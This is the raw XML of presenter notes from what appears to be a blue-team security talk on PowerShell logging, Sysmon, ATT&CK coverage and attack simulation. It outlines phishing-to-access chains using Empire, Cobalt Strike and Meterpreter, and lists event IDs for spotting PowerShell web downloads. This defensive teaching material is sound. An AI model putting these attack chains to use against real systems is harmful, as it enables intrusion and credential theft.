            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Look at</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> yourself with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>Shodan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>, its free</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>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33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2994114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yourself before others check you.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Typically a vulnerability is announced and within 24 hours or so it will be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>weaponized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and sent across the Internet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> for an opportunistic attack.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://www.shodan.io/report</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ok, back to Defense</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FEDE1C12-C9CF-46A0-842F-2DF97B971405}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2215120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Look at that! PowerShell has almost complete logging capabilities… At least turn that on. Especially since a popular attack infra is Empire.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>https://msdnshared.blob.core.windows.net/media/2017/04/comparitive_security.png</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>So what do you do about all the engines that don’t log? Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>Sysmon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FEDE1C12-C9CF-46A0-842F-2DF97B971405}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3766755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https://github.com/olafhartong/sysmon-modular/tree/master/attack_matrix</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>T1204 ATT&amp;CK –Monitor the execution of and command-line arguments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What about no logs things like stealing tokens?</a:t>
            </a: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36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3687715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cool, so you have CIS-CAT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>assement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> tool to put in protections based on benchmarks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Then you know what attackers do with Atomic Red team, CS, or Empire.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Now lets track and measure this.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Develop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> Detection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How do you find them?? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Monitor Registry, files,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Advance solution is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Sysmon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, ETW.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://github.com/redcanaryco/atomic-red-team</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://github.com/redcanaryco/atomic-red-team/tree/master/atomics</a:t>
            </a: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37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1114163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https://attack.mitre.org/wiki/ATT%26CK_Navigator</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>use the Navigator to visualize your defensive coverage, your red/blue team planning, the frequency of detected techniques or anything else you want to do. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://cyberwardog.blogspot.com/2017/07/how-hot-is-your-hunt-team.html</a:t>
            </a:r>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38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2544121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CyberWardog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>GitHub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and download his </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Hunt_Team_HeatMap</a:t>
            </a:r>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39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1739725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Scoring system..</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FEDE1C12-C9CF-46A0-842F-2DF97B971405}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3176929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no more time then go to end!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Next Slide is US-CERT Empire </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FEDE1C12-C9CF-46A0-842F-2DF97B971405}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="89027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Phish </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> Creds -&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> System Access-&gt; Your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>sensititve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://www.cobaltstrike.com/downloads/csmanual311.pdf Page 10 for image.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cobalt strike has a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> that conveys credential snowball attack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Phish </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Creds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> -&gt; OWA -&gt; phish other users </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Phish </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Creds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> -&gt; OWA -&gt; Find Systems account has access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Phish </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Creds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> -&gt; VPN -&gt; workstation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Phish </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Creds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> -&gt; System Access-&gt; WMIC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Phish </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Creds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> -&gt; System Access-&gt;Empire C2C</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Phish </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Creds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> -&gt; System Access-&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Meterpreter</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Phish </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Creds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> -&gt; System Access-&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>BloodHound</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200"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6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4058438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US-Cert and PS Empire</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Let’s use this PowerShell Empire as an example..</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FEDE1C12-C9CF-46A0-842F-2DF97B971405}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2870550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US-Cert and PS Empire</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://www.us-cert.gov/ncas/alerts/AA18-284A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FEDE1C12-C9CF-46A0-842F-2DF97B971405}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3039462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US-Cert and PS Empire</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://www.us-cert.gov/ncas/alerts/AA18-284A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FEDE1C12-C9CF-46A0-842F-2DF97B971405}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10336242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https://www.malwarearchaeology.com/cheat-sheets/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Once we test attack and detection then go ahead and input it into your excel for measurement.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>EventID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 4104 PSv4-5 Look for PowerShell web downloads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>400 Look for PS Web Downloads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>400 – Look for Base64 Module data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>4104 – Event the encoded script block will be decoded for you in PS v4 and V5 if enabled.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FEDE1C12-C9CF-46A0-842F-2DF97B971405}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>45</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11108546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industry practitioners</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> willing to help.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://www.malwarearchaeology.com/cheat-sheets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Once we are done with secure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>configs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> protections, logs, and cheat sheets lets look at how we test attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> in a controlled environment?</a:t>
            </a:r>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46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1004546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https://screencast-o-matic.com/u/vqZ/BuildMacroExploitEmpire</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://attack.mitre.org/wiki/ATT%26CK_Navigator</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>use the Navigator to visualize your defensive coverage, your red/blue team planning, the frequency of detected techniques or anything else you want to do. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://cyberwardog.blogspot.com/2017/07/how-hot-is-your-hunt-team.html</a:t>
            </a:r>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47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3285274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https://screencast-o-matic.com/u/vqZ/BuildMacroExploitEmpire</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Go back one slide to talk about measuring defenses and if no more time skip to end.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/fileless-threats#type-ii-indirect-file-activity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
